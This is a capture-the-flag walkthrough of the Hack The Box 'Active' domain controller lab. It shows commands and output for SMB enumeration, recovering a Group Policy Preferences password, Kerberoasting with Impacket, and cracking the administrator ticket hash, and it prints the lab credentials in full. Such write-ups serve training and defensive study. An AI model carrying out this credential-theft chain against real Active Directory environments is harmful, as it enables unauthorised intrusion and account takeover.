┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.100
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-23 06:40:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/23%OT=53%CT=1%CU=30244%PV=Y%DS=2%DC=I%G=Y%TM=658
OS:6813E%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S
OS:%TS=7)SEQ(SP=FE%GCD=1%ISR=10B%TI=I%CI=I%TS=7)SEQ(SP=FF%GCD=1%ISR=10C%TI=
OS:I%CI=I%II=I%SS=S%TS=7)OPS(O1=M53ANW8ST11%O2=M53ANW8ST11%O3=M53ANW8NNT11%
OS:O4=M53ANW8ST11%O5=M53ANW8ST11%O6=M53AST11)WIN(W1=2000%W2=2000%W3=2000%W4
OS:=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53ANW8NNS%CC=N%Q=)T1(R
OS:=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%
OS:RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=
OS:0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+
OS:%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK
OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-12-23T06:41:45
|_ start_date: 2023-12-23T06:31:12
|_clock-skew: -1s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.100
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
389/udp open ldap
464/udp open|filtered kpasswd5
500/udp open|filtered isakmp
4500/udp open|filtered nat-t-ike
5355/udp open|filtered llmnr
The nmap scan discloses the domain name of the machine to be active.htb. So we’ll edit the /etc/hosts file to map the machine’s IP address to the active.htb domain name.
The first thing I’m going to try to enumerate is DNS. Let’s use nslookup to learn more information about this domain.
┌──(kali💀kali)-[~]
└─$ nslookup
> 10.10.10.100
** server can't find 100.10.10.10.in-addr.arpa: NXDOMAIN
> server 10.10.10.100
Default server: 10.10.10.100
Address: 10.10.10.100#53
It doesn’t give us any information. Next, let’s attempt a zone transfer.
┌──(kali💀kali)-[~]
└─$ host -l active.htb 10.10.10.100
Using domain server:
Name: 10.10.10.100
Address: 10.10.10.100#53
Aliases:
Host active.htb not found: 5(REFUSED)
; Transfer failed.
No luck there as well. I also tried dnsrecon and didn’t get anything useful. So we’ll move on to enumerating SMB on ports 139 and 445. We’ll start with viewing the SMB shares.
┌──(kali💀kali)-[~]
└─$ smbmap -H active.htb
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
The Replication share has READ ONLY permission on it. Let’s try to login anonymously to view the files of the Replication share.
┌──(kali💀kali)-[~]
└─$ smbclient //active.htb/Replication -N
Anonymous login successful
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
-N: suppresses the password since we’re logging in anonymously
We’re in!
After looking through all the files on this share, I found a Groups.xml file in the following directory.
cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
A quick google search tells us that Groups.xml file is a Group Policy Preference (GPP) file. GPP was introduced with the release of Windows Server 2008 and it allowed for the configuration of domain-joined computers. A dangerous feature of GPP was the ability to save passwords and usernames in the preference files. While the passwords were encrypted with AES, the key was made publicly available.
Therefore, if you managed to compromise any domain account, you can simply grab the groups.xml file and decrypt the passwords.
Now that we know how important this file is, let’s download it to our attack machine.
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
This will allow us to gain an initial foothold on the system.
Foothold:
As mentioned above, the password is encrypted with AES, which is a strong encryption algorithm. However, since the key is posted online, we can easily decrypt the encrypted password.
There’s a simple ruby program known as gpp-decrypt that uses the publicly disclosed key to decrypt any given GPP encrypted string. This program is included with the default installation of Kali.
From the Groups.xml file, we know that the username is SVG_TGS. This probably is not the admin user, but regardless let’s try to access the ADMIN$ share with the username/password we found.
┌──(kali💀kali)-[~/Desktop]
└─$ smbclient -W active.htb -U SVC_TGS //active.htb/ADMIN$
Password for [ACTIVE.HTB\SVC_TGS]:
tree connect failed: NT_STATUS_ACCESS_DENIED
-W: domain
-U: username
Nope, that doesn’t work.
Let’s try the USERS share.
┌──(kali💀kali)-[~/Desktop]
└─$ smbclient -W active.htb -U SVC_TGS //active.htb/USERS
Password for [ACTIVE.HTB\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
We’re in!
Navigate to the directory that contains the user.txt flag.
smb: \> cd SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> get user.txt
We compromised a low privileged user. Now we need to escalate privileges.
Privilege Escalation:
Since we’re working with Active Directory and using Kerberos as an authentication protocol, let’s try a technique known as Kerberoasting. To understand how this attack works, you need to understand how the Kerberos authentication protocol works.
If you compromise a user that has a valid kerberos ticket-granting ticket (TGT), then you can request one or more ticket-granting service (TGS) service tickets for any Service Principal Name (SPN) from a domain controller. An example SPN would be the Application Server.
A portion of the TGS ticket is encrypted with the hash of the service account associated with the SPN. Therefore, you can run an offline brute force attack on the encrypted portion to reveal the service account password. Therefore, if you request an administrator account TGS ticket and the administrator is using a weak password, we’ll be able to crack it!
IMPACKET: root.txt
This includes a collection of Python classes for working with network protocols.
They have a script in the /examples folder called GetUserSPNs.py that is used to find SPNs that are associated with a given user account. It will output a set of valid TGSs it requested for those SPNs.
Run the script using the SVC_TGS credentials we found.
┌──(kali💀kali)-[~/impacket/examples]
└─$ ./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.12.0.dev1+20231103.113049.2d00fc6a - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-12-23 01:32:18.802548
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$00e9b5606c0cacb1fa6218f47a5123be$1343821a3e7e0a27717960de5e7fd211226a445ed316b6011929f374f4e49b2911e408a6d7e0e0f02eaf75a3dd3d7a4c79ac30dce4c32b1000f3146ce3591262211524bdf9c980735b87bde1617fcd11c19530384b37642fff96a8a15e0aa9e508c5da3c0495d0fe17da1fc1d22241de63e8b508e14ca9c13ec7d44cdda814d755a9d365b88b9fa8251de907a6a20a7f02389afb71bff59e611ba3998dbd8a7d67a581e4868d08ee4752f1e7deada512a707283b0c3ac46227f2e3f89df52668016c8050595e2a9c5e793f0feb40ce690593cb5570fe37b81a3b1dca5c88f9e6415d89f6da52d60265bb6c83ea4c1160170c4f9095b633221261de0f6adce0048039a05d37d2a4d7cb98f43419d39d9c06c7169c5d68f56cafab1d28eda86e41498d67b41f61c5d00337d40375cbdc14f52fead29516807e9fbe870f6430835e11007bd555f81c73d7951662e762118c47abc5fd59dea92f466fde4c2ed4dcea9882947944331a042d442545e400c24b1733ab2b3649d6705b6dafb8461703f160083e44c9cf7a829a835e4e4331801d7ae82f22d54b4a63787e0a0afc6bbf98e9b652b98f227165a89d5c455b97b2be56168f8f25363319c121127238c0b80ccc5a4f1301289065ad49438f34a59c568b7ba5f58da31ffea4ce0aa1443c31d31612194dbd685aff802729837007465c55497030a8a5b3beb8c678b3ee6adefb4879085492e0129df967d1dbdb179741defdfb5cde116e118cf1a79d5b267e54de230a73abb4ddf214afe147d363774a0f08832b6b5c790ce4b0050269183a815ed98442438d3b9f217d558ebdc505ccd8f0b20830af75f25184db18bbd6a7dcbd2f61209a763cb6c7f94d5bd8fe4ca0b8ce1c3e63d040fa9a3d754d09b23b90216a37775de838462c64da1b14b9228fb77dde534ff7f2cd35597195c808395af318478a386924f50624ea5ac45204c3cb4382d864b8ad0fdc8263bc19ca89b0d9896cb8ae10e81c879a2d1f735abfbe3fa146a27cf00f97fe348c6d51633c6e5a9959b9db1bf21cb82812202cbeaa010375790171e5f0f6ddd7f454b3d19c8a24685872465c488ea0ac7d432f034ee77bc8422c0c35865a852582865db10e3a67ef5aea9e5a6b85933586e7223a5b03226d5283b667a5285d37414303f26eb8034a21545bfe89d93e05b1df6267cffd473ae97326792a80f11ed761ee7b6f7e70e90d10945e6c55596a1c7664239fe4c36096f80c24c9bd212b
target: domain/username:password
-dc-ip: IP address of the domain controller
-request: Requests TGS for users and outputs them in JtR/hashcat format
We were able to request a TGS from an Administrator SPN. If we can crack the TGS, we’ll be able to escalate privileges!
Note: If you get a “Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)”, it’s probably because the attack machine date and time are not in sync with the Kerberos server.
Now that we have a valid TGS that is already in John the Ripper format, let’s try to crack it.
┌──(kali💀kali)-[~/Desktop]
└─$ nano spn-admin.txt
┌──(kali💀kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt spn-admin.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:03 DONE (2023-12-23 04:06) 0.2923g/s 3081Kp/s 3081Kc/s 3081KC/s Tiffani1432..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We get back the password!
Ticketmaster1968
To login as the administrator, we’ll use another Impacket script known as psexec.py. As shown in the help menu, you can run the script using the following command.
